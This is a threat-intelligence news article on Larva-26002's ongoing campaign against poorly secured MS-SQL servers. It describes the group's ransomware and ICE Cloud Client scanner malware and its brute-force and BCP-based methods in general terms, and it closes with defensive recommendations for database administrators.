Threat Intel - Continuous Attacks on MS-SQL Servers Unveiled
Basically, hackers are attacking poorly protected MS-SQL servers to install new malware.
A persistent threat actor is targeting MS-SQL servers using new malware. This ongoing campaign risks extensive data exposure due to poor database security practices. Administrators must act now to secure their systems.
The Threat
The threat actor known as Larva-26002 has been relentlessly targeting Microsoft SQL (MS-SQL) servers since January 2024. This campaign has evolved from a ransomware operation to a more sophisticated strategy involving the deployment of a new scanner malware called ICE Cloud Client. The attacks, which are ongoing into 2026, utilize various tools and techniques to exploit poorly managed servers, indicating a long-term commitment to this malicious endeavor.
Initially, the group deployed Trigona and Mimic ransomware on exposed MS-SQL servers with weak credentials. They exploited the Bulk Copy Program (BCP) utility to install malware directly onto compromised hosts. Over time, they have upgraded their tools, including the introduction of a Rust-based scanner in 2025, and now the Go-based ICE Cloud Client in 2026. This progression shows the attackers' adaptability and determination to exploit vulnerabilities in database infrastructure.
Who's Behind It
Larva-26002 has demonstrated a clear pattern of targeting the same MS-SQL servers repeatedly. Their attacks are characterized by a shift from ransomware to scanning, which suggests they are building a network of compromised servers. The ICE Cloud Client malware collects data from these servers and sends it back to the attacker's command and control (C&C) server, allowing them to map out exposed database assets across the internet. This strategic approach raises concerns about the potential for larger, more damaging attacks in the future.
The use of Turkish binary strings within the malware hints at the attackers' origins or operational base, further linking them to previous incidents involving Mimic ransomware. This connection emphasizes the importance of recognizing patterns in cyber threats to better defend against them.
Tactics & Techniques
The attack mechanism begins when Larva-26002 identifies an MS-SQL server that is poorly secured. They gain access through brute force or dictionary attacks, then execute system commands to profile the host. Malware is created using the BCP utility, which exports malicious binaries from the database. In cases where BCP fails, they utilize tools like Curl or Bitsadmin via PowerShell to download the malware.
Once the ICE Cloud Launcher is executed, it connects to the C&C server to authenticate and download the core ICE Cloud Client. This client is disguised under random filenames to evade detection. It registers with the C&C server, receiving a list of MS-SQL addresses to target, along with credential pairs for login attempts. The entire process showcases the attackers' technical proficiency and their ability to adapt their strategies over time.
Defensive Measures
To mitigate the risks posed by Larva-26002, database administrators must take proactive measures. Here are some recommended actions:
- Enforce strong passwords for all MS-SQL accounts and change them regularly.
- Implement firewalls to restrict internet access to MS-SQL servers, allowing only authorized connections.
- Regularly update endpoint security software to catch known malware before it executes.
- Monitor for unusual BCP activity or unexpected files like api.exe in the system directories.
By following these guidelines, organizations can better protect themselves against the ongoing threats posed by Larva-26002 and similar actors. Vigilance and proactive security measures are essential in the ever-evolving landscape of cyber threats.